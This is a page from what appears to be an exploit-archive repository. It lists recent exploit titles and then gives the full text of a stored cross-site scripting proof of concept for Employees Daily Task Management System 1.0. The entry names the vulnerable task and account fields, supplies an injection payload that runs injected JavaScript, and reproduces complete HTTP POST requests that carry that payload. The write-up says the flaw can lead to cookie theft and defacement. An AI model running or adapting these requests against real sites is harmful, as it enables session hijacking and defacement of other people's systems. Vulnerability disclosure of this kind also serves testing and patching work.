
11 changes to exploits/shellcodes MTPutty 1.0.1.21 - SSH Password Disclosure Raspberry Pi 5.10 - Default Credentials Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated) Chikitsa Patient Management System 2.0.2 - 'backup' Remote Code Execution (RCE) (Authenticated) LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated) TestLink 1.19 - Arbitrary File Download (Unauthenticated) Student Management System 1.0 - SQLi Authentication Bypass Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated) Grafana 8.3.0 - Directory Traversal and Arbitrary File Read Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)
222 lines
No EOL
4.3 KiB
Text
222 lines
No EOL
4.3 KiB
Text
# Exploit Title: Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)
|
|
# Exploit Author: able403
|
|
# Date: 08/12/2021
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip
|
|
# Version: 1.0
|
|
# Tested on: windows 10
|
|
# Vulnerable page: ?page=view_task&id=2
|
|
|
|
Technical description:
|
|
|
|
A stored XSS online event booking and reservation system. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more.
|
|
|
|
xss-1:
|
|
|
|
1) Navigate to http://localhost/?page=view_task&id=2 and clink "edit task"
|
|
2) Insert your payload in the "title" and "Task Description" parameter parameter
|
|
3) Click save
|
|
|
|
Proof of concept (Poc):
|
|
|
|
The following payload will allow you to run the javascript -
|
|
|
|
"><img src=# onerror=alert(123)>
|
|
|
|
---
|
|
POST /Actions.php?a=save_task HTTP/1.1
|
|
|
|
Host: localhost
|
|
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
|
|
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
X-Requested-With: XMLHttpRequest
|
|
|
|
Content-Length: 312
|
|
|
|
Origin: http://localhost
|
|
|
|
Connection: close
|
|
|
|
Referer: http://localhost/?page=tasks
|
|
|
|
Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl
|
|
|
|
|
|
|
|
|
|
id=2&title=Task+102%22%3E%3Cimg+src%3D%23+onerror%3Dalert(123)%3E&status=1&assign_to%5B%5D=2&description=%3Cp%3EThis+is+another+task+for+you.%3C%2Fp%3E%3Cp%3EThis+description+has+been+updated%3C%2Fp%3E%3Cp%3E%3Cbr%3E%3C%2Fp%3E%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3D%23+onerror%3Dalert(333)%26gt%3B%3Cbr%3E%3C%2Fp%3E
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
xss-2
|
|
|
|
1) Navigate to http://localhost.com/?page=manage_account
|
|
2) Insert your payload in the "full name" or "contact" or "email" parameter parameter
|
|
|
|
Proof of concept (Poc):
|
|
|
|
The following payload will allow you to run the javascript -
|
|
|
|
"><img src=# onerror=alert(123)>
|
|
|
|
|
|
|
|
|
|
--
|
|
|
|
POST /Actions.php?a=update_credentials_employee HTTP/1.1
|
|
|
|
Host: localhost
|
|
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
|
|
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
X-Requested-With: XMLHttpRequest
|
|
|
|
Content-Type: multipart/form-data; boundary=---------------------------27882107026209045483167935384
|
|
|
|
Content-Length: 1613
|
|
|
|
Origin: http://localhost
|
|
|
|
Connection: close
|
|
|
|
Referer: http://localhost/?page=manage_account
|
|
|
|
Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl
|
|
|
|
|
|
|
|
|
|
-----------------------------27882107026209045483167935384
|
|
|
|
Content-Disposition: form-data; name="id"
|
|
|
|
|
|
|
|
|
|
1
|
|
|
|
-----------------------------27882107026209045483167935384
|
|
|
|
Content-Disposition: form-data; name="fullname"
|
|
|
|
|
|
|
|
|
|
John D Smith
|
|
|
|
-----------------------------27882107026209045483167935384
|
|
|
|
Content-Disposition: form-data; name="gender"
|
|
|
|
|
|
|
|
|
|
Male
|
|
|
|
-----------------------------27882107026209045483167935384
|
|
|
|
Content-Disposition: form-data; name="dob"
|
|
|
|
|
|
|
|
|
|
1997-06-23
|
|
|
|
-----------------------------27882107026209045483167935384
|
|
|
|
Content-Disposition: form-data; name="contact"
|
|
|
|
|
|
|
|
|
|
098123456789"><img src=# onerror=alert(123)>
|
|
|
|
-----------------------------27882107026209045483167935384
|
|
|
|
Content-Disposition: form-data; name="email"
|
|
|
|
|
|
|
|
|
|
jsmith@sample.com
|
|
|
|
-----------------------------27882107026209045483167935384
|
|
|
|
Content-Disposition: form-data; name="address"
|
|
|
|
|
|
|
|
|
|
Sample Address
|
|
|
|
-----------------------------27882107026209045483167935384
|
|
|
|
Content-Disposition: form-data; name="department_id"
|
|
|
|
|
|
|
|
|
|
1
|
|
|
|
-----------------------------27882107026209045483167935384
|
|
|
|
Content-Disposition: form-data; name="email"
|
|
|
|
|
|
|
|
|
|
jsmith@sample.com
|
|
|
|
-----------------------------27882107026209045483167935384
|
|
|
|
Content-Disposition: form-data; name="password"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
-----------------------------27882107026209045483167935384
|
|
|
|
Content-Disposition: form-data; name="old_password"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
-----------------------------27882107026209045483167935384
|
|
|
|
Content-Disposition: form-data; name="avatar"; filename=""
|
|
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
-----------------------------27882107026209045483167935384-- |